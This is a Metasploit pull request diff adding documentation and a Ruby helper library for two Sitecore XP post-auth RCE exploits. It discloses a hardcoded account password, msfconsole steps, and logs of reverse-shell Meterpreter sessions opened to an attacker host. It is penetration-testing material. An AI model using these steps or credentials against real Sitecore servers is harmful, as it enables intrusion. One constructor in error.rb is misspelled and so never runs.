Merge pull request #20479 from msutovsky-r7/exploit/sitecore/postauth-rce

Adds modules for Sitecore XP post-auth remote code executions (CVE-2025-34510, CVE-2025-34511)

Author: jheysel-r7

documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_34510.md

@@ -0,0 +1,63 @@
+## Vulnerable Application
+
+The Sitecore Experience Platform (XP) is a flagship CMS product.
+Provides comprehensive digital marketing tools, view of customer data and many other features.
+Sitecore deploys multiple default service accounts when installing, among them is an account called ServicesAPI.
+The versions from 10 to 10.4 have a hardcoded password for this account - the password is the letter b (CVE-2025-34509).
+This account is used to gain access and exploit an additional vulnerability - a path traversal in zip extraction (CVE-2025-34510).
+This module exploits both vulnerabilities to gain remote code execution by uploading malicious ASPX into the root directory of the webserver.
+
+### Installation
+
+The Sitecore XP can be downloaded from [here](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform).
+Please note that a license is required for successful installation.
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/windows/http/sitecore_xp_cve_2025_34510`
+1. Do: `set RHOSTS [Sitecore XP IP address]`
+1. Do: `set VHOST [Sitecore XP hostname]`
+1. Do: `set IDENTITY_VHOST [hostname of Sitecore XP identity server]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `run`
+
+## Options
+
+
+### VHOST
+
+The hostname of Sitecore XP.
+When installed, Sitecore XP deploys multiple vhosts, among them is the Sitecore XP host, where a user can access majority of functions.
+
+
+### IDENTITY_VHOST
+
+The Sitecore XP uses separate vhost for "identity host", which is used when user is authenticating and asking for session data.
+If you are not sure about `IDENTITY_VHOST`, you can visit `https://[sitecore instance]/identity/login/shell/SitecoreIdentityServer`.
+The hostname of page where the URL will redirect you can be used as `IDENTITY_VHOST`.
+
+## Scenarios
+
+```
+msf exploit(windows/http/sitecore_xp_cve_2025_34510) > set IDENTITY_VHOST sitecorepocidentityserver.dev.local
+msf exploit(windows/http/sitecore_xp_cve_2025_34510) > run verbose=true
+[*] Started reverse TCP handler on 192.168.3.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Sitecore version detected 10.3.0, which is vulnerable
+[*] Sending stage (203846 bytes) to 10.5.132.138
+[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.138:50530) at 2025-08-26 13:05:53 +0200
+
+meterpreter > sysinfo
+Computer        : WIN11_22H2_0800
+OS              : Windows 11 22H2 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: IIS APPPOOL\sitecorepocsc.dev.local
+```

documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_34511.md

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+The Sitecore Experience Platform (XP) is a flagship CMS product.
+Provides comprehensive digital marketing tools, view of customer data and many other features.
+A user can install multiple extensions to Sitecore XP - among them is Sitecore PowerShell Extension (SPA).
+It is obligatory requirement for popular SXA add-on.
+The SPA is vulnerable to an unrestricted file upload up to version 7.0.
+An attacker can upload malicious ASPX file and gain remote code execution.
+
+
+### Installation
+
+The Sitecore XP can be downloaded from [here](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform).
+Please note that a license is required for successful installation.
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/windows/http/sitecore_xp_cve_2025_34511`
+1. Do: `set RHOSTS [Sitecore XP IP address]`
+1. Do: `set VHOST [Sitecore XP hostname]`
+1. Do: `set IDENTITY_VHOST [hostname of Sitecore XP identity server]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `run`
+
+## Options
+
+
+### VHOST
+
+The hostname of Sitecore XP.
+When installed, Sitecore XP deploys multiple vhosts, among them is the Sitecore XP host, where a user can access majority of functions.
+
+
+### IDENTITY_VHOST
+
+The Sitecore XP uses separate vhost for "identity host", which is used when user is authenticating and asking for session data.
+If you are not sure about `IDENTITY_VHOST`, you can visit `https://[sitecore instance]/identity/login/shell/SitecoreIdentityServer`.
+The hostname of page where the URL will redirect you can be used as `IDENTITY_VHOST`.
+
+
+## Scenarios
+
+
+```
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > set IDENTITY_VHOST sitecorepocidentityserver.dev.local
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > set RHOSTS 10.5.132.138
+RHOSTS => 10.5.132.138
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > set VHOST sitecorepocsc.dev.local
+VHOST => sitecorepocsc.dev.local
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > set IDENTITY_VHOST sitecorepocidentityserver.dev.local
+IDENTITY_VHOST => sitecorepocidentityserver.dev.local
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > run verbose=true 
+[*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Sitecore version detected 10.3.0, which is vulnerable
+[*] Sending stage (203846 bytes) to 10.5.132.138
+[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.138:50194) at 2025-08-26 12:58:22 +0200
+
+meterpreter > sysinfo
+Computer        : WIN11_22H2_0800
+OS              : Windows 11 22H2 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: IIS APPPOOL\sitecorepocsc.dev.local
+```

lib/msf/core/exploit/remote/http/sitecore/error.rb

@@ -0,0 +1,13 @@
+module Msf::Exploit::Remote::HTTP::Sitecore::Error
+  class ClientError < ::StandardError
+    def initialize(message: nil)
+      super(message || 'SitecoreXP Error')
+    end
+  end
+
+  class UnexpectedReplySitecore < ClientError
+    def initialzie(message = 'Received unexpected reply from Sitecore')
+      super(message: message)
+    end
+  end
+end

lib/msf/core/exploit/remote/http/sitecore_xp.rb

@@ -0,0 +1,124 @@
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module SitecoreXp
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Sitecore::Error
+
+          def initialize(info = {})
+            super
+            register_options([OptString.new('IDENTITY_VHOST', [true, 'Hostname of Sitecore identity server']) ])
+          end
+          
+          #
+          # Identifies against identity server. The Sitecore XP uses separate vhost to authenticate and gain session cookies.
+          #
+          def login_identitysrv(username, password)
+            res = send_request_cgi({
+              'uri' => normalize_uri(target_uri.path, 'Account', 'Login'),
+              'method' => 'GET',
+              'vhost' => datastore['IDENTITY_VHOST'],
+              'keep_cookies' => 'true'
+            })
+
+            raise UnexpectedReplySitecore unless res&.code == 200
+
+            hidden_inputs = res.get_hidden_inputs
+
+            verification_token = hidden_inputs.dig(0, '__RequestVerificationToken')
+
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(target_uri.path, 'Account', 'Login'),
+              'vhost' => datastore['IDENTITY_VHOST'],
+              'vars_post' => {
+                'Username' => username,
+                'Password' => password,
+                '__RequestVerificationToken' => verification_token,
+                'ReturnUrl' => '',
+                'AccountPrefix' => 'sitecore\\',
+                'button' => 'login',
+                'RememberLogin' => 'false'
+              },
+              'keep_cookies' => true
+            })
+
+            res&.code == 302 && !res.get_cookies.blank?
+          end
+
+          def get_identity_cookies
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri('identity', 'externallogin'),
+              'vars_get' => {
+                'authenticationType' => 'SitecoreIdentityServer',
+                'ReturnUrl' => '',
+                'sc_site' => 'admin'
+              },
+              'keep_cookies' => true
+            })
+            return false unless res&.code == 302
+
+            location_target = res.headers.fetch('Location', nil)
+
+            return false unless location_target
+
+            location_target =~ %r{://([a-zA-Z0-9._]+)/}
+            identity_vhost = Regexp.last_match(1)
+            proto = datastore['ssl'] ? 'https' : 'http'
+            identity_uri = location_target.sub("#{proto}://#{identity_vhost}", '')
+
+            res = send_request_cgi!({
+              'method' => 'GET',
+              'uri' => identity_uri,
+              'vhost' => identity_vhost,
+              'keep_cookies' => true
+            })
+
+            return false unless res&.code == 200
+
+            hidden_inputs = res.get_hidden_inputs
+
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri('identity', 'signin'),
+              'vars_post' => hidden_inputs[0],
+              'keep_cookies' => true
+            })
+            return false unless res&.code == 302
+
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('identity', 'externallogincallback'),
+              'vars_get' => {
+                'ReturnUrl' => '',
+                'sc_site' => 'admin',
+                'authenticationSource' => 'Default'
+              },
+              'keep_cookies' => true
+            })
+
+            res&.code == 302 && res.headers.fetch('Location', nil)&.include?('sitecore/admin')
+          end
+        
+          def get_version
+            res = send_request_cgi({
+              'uri' => normalize_uri('sitecore', 'shell', 'sitecore.version.xml'),
+              'method' => 'GET'
+            })
+            return nil unless res&.code == 200 && res.body.include?('<version>')
+
+            xml_document = res.get_xml_document
+
+            major_version = xml_document.at('information//version//major').text
+            minor_version = xml_document.at('information//version//minor').text
+            build_version = xml_document.at('information//version//build').text
+
+            return Rex::Version.new("#{major_version}.#{minor_version}.#{build_version}")
+          end
+        end
+      end
+    end
+  end
+end